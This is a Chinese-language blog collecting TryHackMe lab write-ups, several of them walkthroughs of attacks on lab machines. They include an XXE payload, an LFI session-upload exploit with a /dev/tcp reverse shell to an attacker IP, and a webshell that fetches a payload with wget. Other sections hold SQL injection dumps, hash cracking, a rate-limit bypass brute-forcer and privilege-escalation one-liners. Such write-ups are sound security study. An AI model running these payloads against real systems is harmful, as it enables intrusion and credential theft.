Try Hack Me

https://tryhackme.com/room/solar 2021 / 12 / 9 公開了 CVE-2021-44228，影響到了 log4j，它的危害程度達到 10，這個漏洞又被稱作 Log4Shell 現在已經有新版的 2.16.0 Release 了，不過又出現了 Log4j2 Recon 透過掃 Port 可以看到有開 3 個 Port，分別是22,111,8983 rustscan -a 10.10.18.186 -r 1-65535 可以用 nmap 做更詳細的掃瞄 nmap -sV -Pn -A -p22,111,8983 10.10.18.186 可以發現 8983 開的是一個 Apache solr 的 Server Discovery 觀察首頁的版本可以知道他是 Solr 8.11.0 觀察 -Dsolr.log.dir 可以看到他的 log Path 是 /var/solr/logs 下載 lab 提供的 solrlogs.zip 檔案，他是一份範例的 Log 檔案 可以觀察到裡面有一個叫做 solr.log 的檔案會紀錄網頁的 Path 相關 Log ...

URL :　https://tryhackme.com/room/battery IP : 10.10.207.162 Recon 掃 Portrustscan -a 10.10.207.162 -r 1-65535 發現有開22 80nmap -A -p22,80 10.10.207.162- Web 觀察首頁掃路徑- /forms/admin.php- 發現 /forms 把 Header 拔掉就不會自動跳轉- 裡面傳送的資料是 XML ，可能可以 XXE但沒有登入都失敗 function XMLFunction(){ var xml = '' + '' + '' + '' + $('#name').val() + '' + '' + $('#search').val() + '' + ''; var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if(xmlhttp.readyState == 4){ console.log(xmlhttp.readyState); console.log(xmlhttp.responseText); document.getElementById('errorMessage').innerHTML = xmlhttp.responseText; } } xmlhttp.open("POST","forms.php",true); xmlhttp.send(xml); }; 在 register.php 註冊一組帳密meow ABC meow 註冊成功嘗試登入- 使用介面上的功能 發現不能使用再註冊一組- meow1 DEF meow1掃目錄- 發現一個 /report載下來發現是一個 ELF- Reverse 選單使用者- 字串比較- 更新- 這邊看到 admin@bank.a 滿可疑的 Web 嘗試註冊 admin@bank.a 被嘲諷ㄌQQ 但這代表應該確實跟這個有關!!用 Burp 後面加上 %00 截斷- 註冊成功- 後台亂輸入都會噴錯- 重新試著 XXE- function XMLFunction(){ var xml = '' + '\n' + ' ]>\n' + '' + '' + "0" + '' + '' + "&b;" + '' + ''; var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if(xmlhttp.readyState == 4){ console.log(xmlhttp.readyState); console.log(xmlhttp.responseText); } } xmlhttp.open("POST","forms.php",true); xmlhttp.send(xml); }; XMLFunction(); 可以讀檔 cyber:x:1000:1000:cyber,,,:/home/cyber:/bin/bash mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false yash:x:1002:1002:,,,:/home/yash:/bin/bash 看起來有興趣的使用者cyber yash讀取原始碼- php://filter/convert.base64-encode/resource=/var/www/html/acc.php 找到註解上的密碼//MY CREDS :- cyber:super#secure&password! SSH 順利連上取得 Base Flag- 提權 起手式 sudo -l 發現可以用 root 執行一個 run.py``run.py- 但我們沒有權限讀取他 QQ觀察原始碼- admin.php找到 mysql 的帳密Dump Mysql- mysqldump -u root -h 127.0.0.1 -p details > a.sql 看到一組密碼 I_know_my_password但好像就沒有什麼進展了 QQ跑 Linpeas- 發現 Linux Kernel 好像有點舊，可以用 Exploit https://www.exploit-db.com/exploits/37292試著載下來編譯執行- 就成功 Root ㄌFlag2- Root Flag- 另外一種提權法 剛剛可以用 sudo 執行 run.py但是沒有權限可以讀取但因為這是我的家目錄，所以我可以改檔名、新增檔案- 所以自己創一個 run.py- import os os.system("/bin/bash")再 sudo 它- 也可以順利提權 學到ㄌ %00 截斷 XXE 記得加 ;

URL : https://tryhackme.com/room/windowsfundamentals1xbx Task 1 Introduction to Windows 可以用 RDP 之類的方法進入 Windows預設帳號 : administrator 預設密碼 : letmein123!但我直接用 THM 提供的 web RDP 介面- Task 2 Windows Editions Home 版本 跟 Pro 的差別可以使用 BitLocker 可以使用 WIP https://www.microsoft.com/en-us/windows/compare-windows-10-home-vs-proWhat encryption can you enable on Pro that you can’t enable in Home?- A: BitLocker Task 3 The Desktop (GUI) Which selection will hide/disable the Search box? HiddenWhich selection will hide/disable the Task View button?- Show Task View buttonBesides Clock, Volume, and Network, what other icon is visible in the Notification Area?- action center Task 4 The File System 檔案系統FAT16 / FAT32File Allocation Table USB 裝置之類ㄉ還是看ㄉ到HPFS- High Performance File SystemNTFS- New Technology File SystemNTFS 優勢- 文件紀錄系統，可以自動修復日誌 單檔案 >= 4G 可以針對資料夾跟黨按設定權限 資料夾跟檔案的壓縮 加密 (Encryption File System, EFS)NTFS 權限- Read對資料夾 ： 可以觀看，跟顯示資料夾中的檔案與子資料夾 對檔案：可以觀看或存取檔案的內容Write- 對資料夾 ： 可以在資料夾中增加檔案或子資料夾 對檔案：可以對檔案進行寫入Read & Execute- 對資料夾 ： 可以觀看，顯示資料夾中的檔案與子資料夾；可以直行檔案，會繼承給檔案以及資料夾 對檔案：可以觀看、存取檔案的內容，也可以直行黨按List folder contents- 對資料夾：可以觀看，並列出檔案以及子資料夾，以及執行檔案，只能給 資料夾繼承Modify- 對資料夾：可以讀取、寫入檔案以及子資料夾；允許刪除資料夾 對檔案：可以讀取，寫入檔案；允許刪除檔案Full Control- 對資料夾，允許讀取、寫入、變更以及刪除檔案與子資料夾 對檔案：允許讀取、寫入、變更予刪除檔案 Alternate Data Streams (ADS) 一種 NTFS 的 attribute 每一個檔案至少都會有一個 Data Stream ($DATA) ADS 允許一個檔案包含多個 Data Stream Windows Explorer 不會對使用者顯示 ADS，需要透過特定的第三方軟體或是 Powershell 所以有時候 Malware 會使用 ADS 來隱藏資料 延伸閱讀 https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/ 範例建立一個 ADS 的東東用 Dir 看不出來- 用 Type 也看不出來- 可以用 powershell GET-Item -path C:\Users\Administrator\Desktop\example -stream *- CMD 需要裝 Sysinternals 的 Streams- https://docs.microsoft.com/zh-tw/sysinternals/downloads/streamsWhat is the meaning of NTFS?- New Technology File System Task 5 The Windows\System32 Folders %windir%最常見的位子在 C:\Windows 裡面存放著作業系統，但他不一定需要在 C，也有一些喪心病狂的人會把他設定在其他地方 所以我們可以使用環境變數，或是說系統環境變數(System environment variables) 來正確的訪問System32- 資料夾中有許多對作業系統來說很重要的檔案 在變動、刪除時要特別小心，很可能讓系統爛掉What is the system variable for the Windows folder?- %windir% Task 6 User Accounts, Profiles, and Permissions 兩種類型的帳戶Administrator增、刪使用者 修改 Group 修改作業系統設定Standard User- 修改與該使用者相關的資料夾、檔案的屬性 不能做系統層級的修改，例如安裝軟體使用者家目錄- C:\Users\{Username} 預設會有Desktop Documents Downloads Music PicturesLocal User and Group Management- lusrmgr.msc 可以看到各種使用者、群組的資訊What is the name of the other user account?- tryhackmebillyWhat groups is this user a member of?- Remote Desktop Users,UsersWhat built-in account is for guest access to the computer?- GuestWhat is the account status?- Account is disabled Task 7 User Account Control UACUser Account ControlVista 後開始使用的可以觀察到一個安裝檔案可能並沒有使用者相關的權限- 登入一個普通使用者- tryhackmebilly / window$Fun1! 10.10.229.121 會發現多出盾牌 icon如果執行安裝- 會需要輸入 Administrator 的密碼 What does UAC mean?- User Account Control Task 8 Settings and the Control Panel Win8 後出現 Settings 頁面舊版控制台 (Control Panel)- In the Control Panel, change the view to Small icons. What is the last setting in the Control Panel view?- 右上角選 small icons 最後一個選項是 Windows Defender Firewall Task 9 Task Manager What is the keyboard shortcut to open Task Manager?ctrl+shift+esc 哇酷，我還真不知道有這種東西呢 Task 10 Conclusion 喵喵

URL : https://tryhackme.com/room/vulnnet1 IP : 10.10.86.144 題目敘述You will have to add a machine IP with domain vulnnet.thm to your /etc/hosts Recon 掃 Portrustscan -a 10.10.86.144 -r 1-65535nmap -A -p22,80 10.10.86.144- 掃目錄- python3 dirsearch.py -u http://10.10.86.144/ 發現登入頁面- 戳了常見的 SQLi 都不行觀察網頁連結- 透過 js formatter 轉漂亮- broadcast.vulnnet.thm 加到 /etc/hosts前面的階段也可以用 LinkFinder- python3 linkfinder.py -i http://vulnnet.thm/python3 linkfinder.py -i http://vulnnet.thm/js/index__d8338055.js- 發現首頁可以帶一個 ?referer 參數訪問 broadcast.vulnnet.thm- 發現需要登入觀察首頁 referer 參數- 發現可以 LFI用 Session upload progress 大法 import grequests sess_name = 'meowmeow' sess_path = f'/var/lib/php/sessions/sess_{sess_name}' base_url = 'http://vulnnet.thm/index.php' param = "referer" #code = "file_put_contents('/tmp/shell.php','& /dev/tcp/10.13.21.55/7877 0>&1'");''' while True: req = [grequests.post(base_url, files={'f': "A"*0xffff}, data={'PHP_SESSION_UPLOAD_PROGRESS': f"pwned:"}, cookies={'PHPSESSID': sess_name}), grequests.get(f"{base_url}?{param}={sess_path}")] result = grequests.map(req) if "pwned" in result[1].text: print(result[1].text) break 然後就 RCE 了 (感覺就不是正規解…ㄏㄏ 提權 python3 -c 'import pty; pty.spawn("/bin/bash")' 掃豌豆 找到 backup觀察 backup 檔案，發現有 ssh-backup- 偷出來解壓縮- 發現是 id_rsa到家目錄看使用者名稱- server-management發現是 server-management準備 ssh 登入- 發現 id_rsa 需要密碼 QQ用約翰爆破- python3 ../../ssh2john.py id_rsa > id_rsa_john 密碼是 oneTWO3gOyacSSH 登入- 取得 user flag跑豌豆掃到 .htpasswd 密碼的 hash- 猜測應該是給 broadcast.vulnnet.thm 用的 用約翰爆破個 密碼是 ``9972761drmfsls猜測原始思路正規解法應該是 LFI 到這個檔案訪問 broadcast.vulnnet.thm- 使用帳號 developers密碼 9972761drmfsls`- 推測這應該是某個有 RCE 洞的 CMS 正規解是從這邊進 RCE ㄅ 隨便 二次提權 想起前面的 Backup 用了 tar *所以可以快速提權 接 Shell- 取 Root Flag-

URL : https://tryhackme.com/room/sustah IP : 10.10.252.122 Recon 掃 Portrustscan -a 10.10.252.122 -r 1-65535nmap -A -p22,80,8085 10.10.252.122- gunicorn 20.0.4觀察首頁- 啥都ㄇ有 掃目錄 也沒東西觀察 8085 port- 看起來像是幸運轉盤 掃目錄 有一個 ping 他只會回 pong 爆數字 下面有一個猜數字遊戲 他說我有 0.004% 的勝率 先測一下能不能爆破 from bs4 import BeautifulSoup import requests headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://10.10.252.122:8085', 'Connection': 'keep-alive', 'Referer': 'http://10.10.252.122:8085/home', 'Upgrade-Insecure-Requests': '1', } data = { 'number': '123' } for i in range(100): response = requests.post('http://10.10.252.122:8085/home', headers=headers, data=data) soup = BeautifulSoup(response.text,'html.parser') try: print(soup.find('h3').text) except: print(soup) 發現次數過多他會噴{"error":"rate limit execeeded"} 試了很多次發現- 帶 ‘X-Remote-Addr’ : ‘127.0.0.1’ 就不會噴錯了計算一下- 1/(0.004%) = 25000 所以猜測密碼在這之間 寫腳本來爆一下 from bs4 import BeautifulSoup import requests from multiprocessing import Process, Pool headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://10.10.252.122:8085', 'Connection': 'keep-alive', 'Referer': 'http://10.10.252.122:8085/home', 'Upgrade-Insecure-Requests': '1', 'X-Remote-Addr' : '127.0.0.1' } l = [i for i in range(25000)] def meow(num): data = { 'number': num } response = requests.post('http://10.10.252.122:8085/home', headers=headers, data=data) soup = BeautifulSoup(response.text,'html.parser') try: s = soup.find('h3').text if 'Oh no!' not in s: print(num,s) except: print(soup , response.status_code) p = Pool(200) p.map(meow,l) 幾秒鐘就爆出來ㄌ 10921他回應我這個 /YouGotTh3P@th/- 加到 80 port 的 Path 上面會出現一個 CMS- CMS 發現他是 Mara CMS 預設可以用 admin / changeme 進行登入登入完還要我趕快改密碼- 查詢相關 Exploit- https://www.exploit-db.com/exploits/48780 目測是可以直接傳 webshell那就給他直接傳下去ㄅ- 還真的可以- http://10.10.252.122/YouGotTh3P@th/img/webshell.php?A=wget 10.13.21.55:8000/s -O /tmp/s戳 reverse shell 提權 python3 -c "import pty;pty.spawn('/bin/bash')" 試著用 LSEbash lse.sh -l1 看不出什麼東西 QQ發現 find 指令被封鎖 QWQ- 提示說去找備份檔案 網路上看到兩種解法tar cf - $PWD 2>/dev/null | tar tvf - | grep backup慢du -a 2>/dev/null | grep backup- 快就找到了 /usr/backups- 觀察發現有一個隱藏檔 .bak.passwd- 解開來看獲得帳號密碼- kiran / trythispasswordforuserkiran透過 su 切過去- 取得 User Flag- 二次提權 起手式 sudo -l使用豌豆- 發現有一個 doas 酷指令，可以不用 suid 或 sudo去 GTFOBins 尋找 rsync to shell- https://gtfobins.github.io/gtfobins/rsync/#suid doas rsync -e 'sh -p -c "sh 0&2"' 127.0.0.1:/dev/null 成功提權取得 Root Flag-

URL : https://tryhackme.com/room/madeyescastle IP : 10.10.150.136 Recon 掃 Portrustscan -a 10.10.150.136 -r 1-65535Open 10.10.150.136:22 Open 10.10.150.136:80 Open 10.10.150.136:139 Open 10.10.150.136:445nmap -A -p22,80,139,445 10.10.150.136- 掃路徑- python3 dirsearch.py -u http://10.10.150.136backup/觀察首頁- 比起 Apache Default Page 好像多了一個 Logo 但是他死ㄌ嘗試 smb- smbclient -N '//10.10.150.136/sambashare' 匿名登入- 下載檔案- 觀察檔案 感覺很像某種字典檔- 另外一個檔案 感覺有某些提示， Hagrid 可能用 rockyou 的密碼嘗試 Hydra 爆密碼- hydra -L user.txt -P spellnames.txt hogwartz-castle.thm http-post-form "/login:user=^USER^&password=^PASS^:Incorrect Username or Password" 感覺很慢，沒效率，先放著丟一邊觀察首頁的註解- 看起來可以改 /etc/hosts用 domain name 來訪問首頁- 看起來是可以輸入帳號密碼的頁面掃路徑- 看起來沒啥東西 SQLi 嘗試 SQLi亂輸入會噴 500 錯誤先複製 curl- curl 'http://hogwartz-castle.thm/login' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://hogwartz-castle.thm' -H 'Connection: keep-alive' -H 'Referer: http://hogwartz-castle.thm/' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'user=aa&password=bb'可以戳 Union- 'union select 1,2,3,4 -- 測了一些 version 之類的東東都發現不行- 才發現他是 SQLite ‘union select sqlite_version(),2,3,4 – SQLite 爆表- 'union select name,2,3,4 from sqlite_master WHERE type='table' -- 發現只有一張 users 的 table爆 Column- 'union select sql,2,3,4 from sqlite_master WHERE type='table' -- name password admin notes選使用者- 'union select group_concat(name),2,3,4 from users -- 選 admin- 爆 使用者跟密碼組- import requests headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://hogwartz-castle.thm', 'Connection': 'keep-alive', 'Referer': 'http://hogwartz-castle.thm/login', 'Upgrade-Insecure-Requests': '1', } # 'union select 1,2,3,4 -- for i in range(1,40): data = { 'user': f"'union select name || ':' || password,2,3,4 from users limit {i},1 --", 'password': '123' } response = requests.post('http://hogwartz-castle.thm/login', headers=headers, data=data) name = response.text[27:-19] print(name) 取的所有的 hash分析 hash 格式- SHA 512用哈希貓- hashcat -m 1700 hashes.txt spellnames.txt hashcat -m 1700 hashes.txt /opt/rockyou.txt 發現基本上都爆不出來觀察 notes- 'union select group_concat(notes),2,3,4 from users -- 發現密碼用ㄌ best64查詢哈希貓 best64 的用法- https://github.com/hashcat/hashcat/blob/master/rules/best64.rule hashcat -m 1700 hashes.txt /opt/rockyou.txt -r best64.rule 成功爆出來密碼b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885:wingardiumleviosa123回來用 SQLi 找使用者看看- 'user': "'union select name,2,3,4 from users where password like 'b326e7a6%' -- Harry Turner觀察他的 notes- "'union select notes,2,3,4 from users where password like 'b326e7a6%' -- 使用 first name SSH ssh harry@hogwartz-castle.thm密碼 ： wingardiumleviosa123 登入成功 提權 sudo -l 發現一個叫做 pico 的程式 可以用 hermonine 執行 pico執行看看- 發現打開是 nano尋找利用方式- https://gtfobins.github.io/gtfobins/nano/#sudo sudo -u hermonine /usr/bin/pico ^R^X reset; sh 1>&0 2>&0 成功橫向移動成功取得 User Flag- 二次提權 發現使用者根目錄有 .python_history 看起來是有用過 pwntools 的遺跡python -c 'import pty; pty.spawn("/bin/bash")'- 增加互動性跑豌豆- 找到一個奇妙的，有 suid 的檔案/srv/time-turner/swagger直接執行- 看起來是猜數字遊戲丟進 ida- 看起來是用 timestamp 當 random seed 我們可以自己編譯一個程式，餵入當前時間date +%s ; /srv/time-turner/swagger- 可以取得當前 timestamp ，並執行程式編譯自己的 C 語言程式，給予指定的 timestamp- 填上去！- 成功，發現他會呼叫沒有絕對路徑的 uname所以可以蓋 path- /bin/date +%s ;PATH=/home/hermonine/fakepath:$PATH /srv/time-turner/swagger 就成功 root 了取得 Root Flag- RME{M@rK-3veRy-hOur-0135d3f8ab9fd5bf}

URL : https://tryhackme.com/room/lookingglass IP : 10.10.150.136 Recon 掃 portrustscan -a 10.10.150.136 -r 1-65535 三小 ?_? 先看看比較特別的 22 port 也沒啥特別ㄉrustscan -a 10.10.150.136 -r 1-65535 --accessible | tee rustscan.txt- 存成檔案用 curl 觀察- 用 nmap 觀察- nmap -sV -p9001,9011,9003,9000,9009,9006,9005,9004,9015,9008,9007,9013,9017,9002,9010,9012,9020,9014,9019,9016,9024,9018,9027,9026,9034,9025,9023,9021,9022,9033,9035,9039,9030,9029,9051,9031,9045,9040,9052,9028,9042,9038,9041,9032,9048,9044,9043,9037,9049,9036,9059,9047,9050,9058,9057,9054,9053,9061,9056,9046,9064,9055,9062,9071,9060,9063,9068,9067,9066,9065,9075,9074,9073,9072,9070,9069,9081,9076,9080,9082,9078,9079,9091,9089,9077,9085,9101,9088,9086,9083,9100,9084,9095,9099,9093,9087,9090,9094,9096,9092,9097,9098,9103,9105,9104,9102,9107,9106,9109,9114,9110,9108,9115,9111,9113,9112,9117,9121,9116,9119,9120,9118,9122,9123,9127,9126,9131,9125,9130,9129,9124,9128,9132,9133,9135,9134,9137,9136,9138,9143,9140,9141,9142,9158,9155,9154,9147,9149,9145,9139,9161,9167,9156,9148,9168,9150,9146,9164,9166,9165,9177,9157,9152,9144,9162,9151,9174,9153,9172,9159,9178,9173,9171,9179,9160,9180,9163,9169,9184,9189,9193,9186,9170,9195,9176,9185,9175,9181,9182,9204,9192,9183,9190,9191,9202,9194,9197,9200,9206,9196,9209,9208,9188,9187,9215,9203,9198,9199,9205,9201,9213,9217,9216,9210,9214,9212,9211,9219,9218,9207,9220,9221,9222,9223,9225,9224,9228,9226,9227,9231,9229,9230,9232,9233,9234,9235,9236,9238,9237,9247,9240,9241,9248,9250,9253,9243,9239,9245,9242,9252,9251,9254,9246,9244,9249,9255,9258,9259,9256,9257,9267,9260,9262,9264,9263,9266,9261,9265,9268,9270,9273,9274,9271,9269,9276,9275,9272,9277,9283,9278,9285,9279,9284,9281,9280,9282,9286,9287,9289,9288,9290,9291,9293,9292,9294,9295,9297,9299,9296,9301,9303,9298,9300,9302,9304,9305,9306,9307,9308,9309,9310,9311,9316,9312,9314,9317,9313,9315,9318,9320,9321,9322,9324,9325,9323,9319,9329,9326,9331,9330,9328,9332,9327,9333,9334,9335,9337,9340,9338,9343,9344,9336,9342,9339,9345,9346,9341,9348,9350,9352,9347,9351,9349,9353,9356,9355,9358,9360,9354,9357,9364,9362,9359,9363,9367,9361,9365,9366,9375,9373,9369,9374,9368,9381,9380,9384,9371,9376,9377,9370,9372,9378,9382,9379,9385,9383,9389,9387,9388,9390,9393,9392,9386,9391,9394,9395,9396,9397,9398,9399,9400,9401,9412,9410,9408,9419,9417,9424,9402,9406,9420,9407,9415,9413,9414,9425,9405,9416,9418,9404,9411,9403,9409,9426,9421,9423,9427,9429,9422,9428,9430,9431,9432,9433,9434,9435,9442,9440,9437,9439,9441,9438,9436,9446,9450,9444,9443,9445,9447,9449,9448,9451,9454,9452,9453,9458,9455,9459,9456,9457,9463,9460,9461,9465,9462,9468,9464,9466,9467,9470,9469,9474,9473,9472,9477,9478,9471,9482,9476,9475,9480,9483,9479,9481,9485,9486,9484,9491,9487,9488,9489,9490,9493,9492,9494,9498,9499,9497,9496,9495,9502,9501,9500,9503,9505,9504,9508,9510,9507,9506,9509,9511,9512,9513,9514,9517,9519,9515,9516,9520,9518,9522,9527,9526,9528,9521,9525,9524,9530,9533,9523,9529,9534,9532,9531,9535,9536,9537,9539,9538,9540,9541,9545,9543,9542,9544,9546,9551,9549,9547,9554,9548,9555,9556,9557,9550,9558,9552,9553,9559,9561,9560,9562,9564,9565,9563,9568,9566,9569,9571,9567,9573,9574,9572,9575,9570,9576,9580,9577,9581,9579,9578,9582,9583,9584,9586,9585,9587,9589,9594,9588,9590,9592,9591,9593,9595,9601,9598,9600,9602,9599,9597,9596,9603,9609,9608,9607,9606,9610,9604,9615,9612,9619,9617,9605,9613,9621,9614,9611,9616,9620,9622,9618,9623,9644,9626,9627,9638,9633,9640,9629,9630,9624,9642,9634,9637,9636,9643,9632,9635,9625,9641,9647,9645,9639,9628,9631,9646,9648,9649,9650,9651,9653,9654,9652,9659,9657,9655,9658,9656,9660,9661,9663,9662,9664,9665,9666,9668,9667,9671,9669,9670,9672,9673,9675,9674,9676,9678,9677,9679,9680,9681,9682,9683,9684,9685,9686,9692,9689,9687,9693,9690,9688,9691,9694,9695,9698,9696,9699,9697,9700,9724,9725,9722,9737,9726,9723,9728,9721,9738,9727,9739,9736,9735,9740,9741,9742,9745,9744,9743,9747,9748,9750,9746,9752,9749,9754,9753,9751,9762,9763,9764,9766,9770,9767,9765,9771,9773,9772,9780,9777,9781,9779,9778,9790,9789,9801,9802,9791,9799,9804,9811,9803,9800,9806,9805,9808,9814,9815,9809,9807,9810,9813,9816,9817,9812,9818,9821,9819,9820,9824,9828,9822,9826,9823,9829,9825,9827,9830,9831,9832,9833,9837,9834,9836,9839,9841,9835,9838,9848,9840,9842,9846,9847,9844,9851,9849,9845,9850,9843,9853,9852,9865,9857,9855,9859,9862,9854,9856,9863,9861,9866,9860,9858,9868,9864,9867,9870,9869,9872,9871,9878,9874,9875,9879,9873,9877,9876,9880,9884,9886,9882,9881,9888,9889,9883,9887,9885,9893,9892,9891,9890,9896,9900,9904,9898,9895,9899,9894,9901,9910,9907,9906,9905,9897,9908,9903,9902,9913,9909,9912,9911,9915,9926,9914,9924,9917,9923,9920,9919,9925,9922,9921,9918,9916,9930,9928,9927,9929,9934,9941,9937,9939,9931,9933,9936,9935,9940,9938,9932,9942,9943,9944,9961,9972,9966,9962,9971,9964,9967,9969,9963,9968,9970,9965,9975,9973,9974,9978,9979,9977,9980,9976,9981,9996,9983,9982,10000,9984,9986,9985,9997,10001,9998,9999,10002,10003,10006,10005,10004,10007,10011,10017,10015,10012,10008,10009,10013,10014,10010,10016,10018,10020,10019,10021,10022,10024,10023,10027,10025,10028,10026,10034,10032,10030,10029,10035,10031,10033,10037,10036,10039,10038,10042,10041,10044,10040,10045,10043,10046,10047,10049,10048,10050,10052,10051,10056,10053,10054,10055,10057,10058,10060,10059,10064,10065,10067,10062,10070,10071,10066,10061,10063,10069,10073,10072,10068,10074,10075,10078,10077,10076,10079,10080,10083,10081,10084,10082,10086,10087,10085,10088,10090,10092,10089,10091,10095,10093,10098,10094,10096,10097,10099,10101,10100,10102,10103,10105,10104,10106,10107,10110,10111,10112,10108,10114,10109,10113,10116,10115,10117,10119,10118,10120,10121,10122,10124,10123,10126,10128,10125,10132,10129,10135,10127,10131,10130,10133,10134,10138,10137,10139,10141,10140,10142,10136,10143,10149,10145,10150,10146,10153,10148,10151,10147,10144,10152,10154,10155,10156,10162,10158,10161,10160,10159,10157,10174,10172,10179,10173,10178,10180,10181,10182,10185,10183,10184,10188,10187,10186,10189,10190,10191,10193,10192,10195,10194,10196,10198,10199,10197,10202,10200,10201,10205,10207,10203,10204,10212,10211,10208,10206,10210,10209,10214,10213,10215,10217,10216,10223,10218,10221,10219,10220,10222,10224,10226,10225,10229,10227,10231,10228,10230,10239,10240,10238,10242,10241,10243,10244,10245,10246,10248,10249,10247,10251,10250,10255,10252,10261,10253,10254,10256,10257,10262,10259,10260,10263,10258,10265,10264,10266,10267,10268,10269,10270,10271,10272,10275,10273,10278,10274,10279,10292,10277,10276,10293,10294,10295,10297,10299,10296,10298,10301,10300,10345,10344,10347,10346,10343,10348,10350,10352,10349,10351,10353,10354,10355,10374,10378,10379,10377,10375,10376,10381,10383,10380,10382,10436,10384,10438,10437,10440,10439,10441,10442,10446,10447,10449,10445,10444,10450,10452,10453,10448,10455,10456,10454,10463,10462,10460,10464,10465,10461,10459,10477,10466,10476,10475,10478,10480,10479,10484,10487,10486,10485,10488,10491,10489,10493,10490,10492,10494,10496,10495,10497,10499,10502,10500,10498,10503,10501,10506,10504,10507,10508,10505,10513,10511,10510,10514,10518,10509,10512,10515,10516,10521,10517,10522,10523,10520,10526,10519,10524,10530,10528,10525,10527,10529,10531,10533,10532,10536,10540,10534,10535,10538,10539,10541,10542,10537,10544,10545,10546,10548,10543,10547,10551,10550,10552,10549,10557,10554,10556,10559,10558,10560,10561,10553,10555,10563,10562,10564,10565,10567,10569,10566,10568,10570,10571,10576,10573,10577,10575,10572,10578,10574,10579,10581,10580,10582,10584,10583,10585,10590,10593,10588,10586,10595,10587,10589,10592,10591,10600,10603,10596,10594,10601,10597,10598,10599,10604,10605,10602,10607,10606,10608,10611,10610,10609,10615,10613,10612,10614,10616,10618,10617,10620,10619,10621,10624,10625,10622,10623,10626,10630,10632,10628,10634,10627,10631,10635,10629,10633,10636,10637,10638,10639,10640,10644,10646,10642,10649,10643,10641,10645,10647,10648,10650,10651,10653,10652,10654,10655,10657,10656,10658,10661,10660,10659,10662,10664,10663,10666,10665,10668,10667,10670,10669,10671,10672,10673,10674,10675,10676,10678,10677,10679,10680,10681,10683,10684,10682,10685,10687,10686,10688,10689,10690,10691,10692,10693,10694,10698,10699,10696,10697,10695,10700,10701,10703,10704,10705,10702,10706,10707,10708,10709,10712,10710,10711,10714,10713,10715,10717,10718,10716,10719,10720,10721,10722,10723,10724,10726,10725,10727,10728,10729,10733,10736,10734,10731,10730,10737,10732,10735,10738,10739,10740,10741,10742,10746,10747,10744,10743,10745,10749,10748,10751,10750,10752,10754,10753,10755,10756,10757,10758,10762,10760,10759,10761,10763,10768,10764,10765,10766,10771,10770,10767,10769,10772,10773,10774,10775,10776,10777,10780,10779,10778,10785,10788,10786,10784,10782,10787,10783,10781,10792,10789,10790,10791,10793,10794,10795,10796,10797,10798,10799,10801,10800,10803,10802,9733,9757,9761,9758,9734,9760,9715,9759,9717,9720,10804,9716,9731,9719,9732,9755,9712,9708,9769,9718,9756,9768,9713,9730,10805,9714,9729,9710,9711,9709,9706,9702,9705,9703,9707,10806,9701,9704,10807,10809,10812,10808,10810,10813,10811,10815,10814,10816,10817,10823,10820,10819,10821,10822,10818,10827,10826,10825,10824,10828,10834,10831,10829,10833,10836,10832,10830,10837,10835,10838,10842,10841,10840,10843,10839,10857,10844,10858,10855,10861,10860,9776,10856,9774,9775,9782,9798,9788,9784,9783,9786,9795,9787,9785,10863,10862,9796,10864,9792,9794,9797,9793,10865,10866,10878,10888,10883,10880,10887,10882,10879,10889,10885,10881,10884,10886,10891,10890,10893,10894,10892,10895,10903,10901,10902,10904,10896,10905,10919,10918,10920,10921,10922,10923,10925,10926,10924,10930,10927,10929,10928,10931,10932,10933,10934,10935,10937,10936,10938,10939,10940,10941,10942,10943,10944,10945,10948,10947,10946,10949,10950,10952,10951,10955,10954,10953,10956,10959,10958,10957,10961,10960,9956,9951,9959,9957,9945,9955,9954,9948,9953,9947,10962,9960,9958,9949,9952,10967,10965,9946,10970,10968,10966,9950,10964,10963,10969,10971,10972,10973,10975,10976,10980,10974,10982,10977,10978,10979,10981,10983,10985,9991,9995,10984,9993,9992,9994,9989,9990,9987,9988,10986,10988,10987,10990,10991,10989,10994,10993,10992,10997,10996,10998,10995,10999,11001,11000,11005,11002,11006,11004,11010,11009,11003,11008,11011,11007,11012,11013,11016,11017,11014,11015,11019,11020,11018,11021,11022,11023,11024,11031,11025,11030,11027,11028,11026,11029,11033,11035,11034,11032,11036,11037,11038,11040,11042,11039,11041,11043,11044,11046,11045,11047,11048,11049,11050,11051,11053,11054,11052,11055,11057,11056,11059,11058,11060,11062,11063,11061,11065,11066,11069,11064,11067,11068,11070,11071,11073,11074,11075,11072,11079,11076,11077,11078,10169,10177,10163,10164,10166,10170,11080,10171,10176,10175,10165,10167,11081,10168,11083,11082,11084,11085,11086,11087,11088,11089,11090,11091,11095,11093,11094,11092,11097,11100,11096,11101,11102,11098,11099,11105,11103,11104,11106,11114,11109,11110,11108,11113,11111,11116,11107,11115,11117,11122,11112,11118,11120,11121,11119,11123,11124,11125,11127,11126,11128,11129,11130,11131,11134,11133,11132,11137,11136,11135,11138,11139,11140,11142,11141,11143,11144,11148,11146,11149,11145,11147,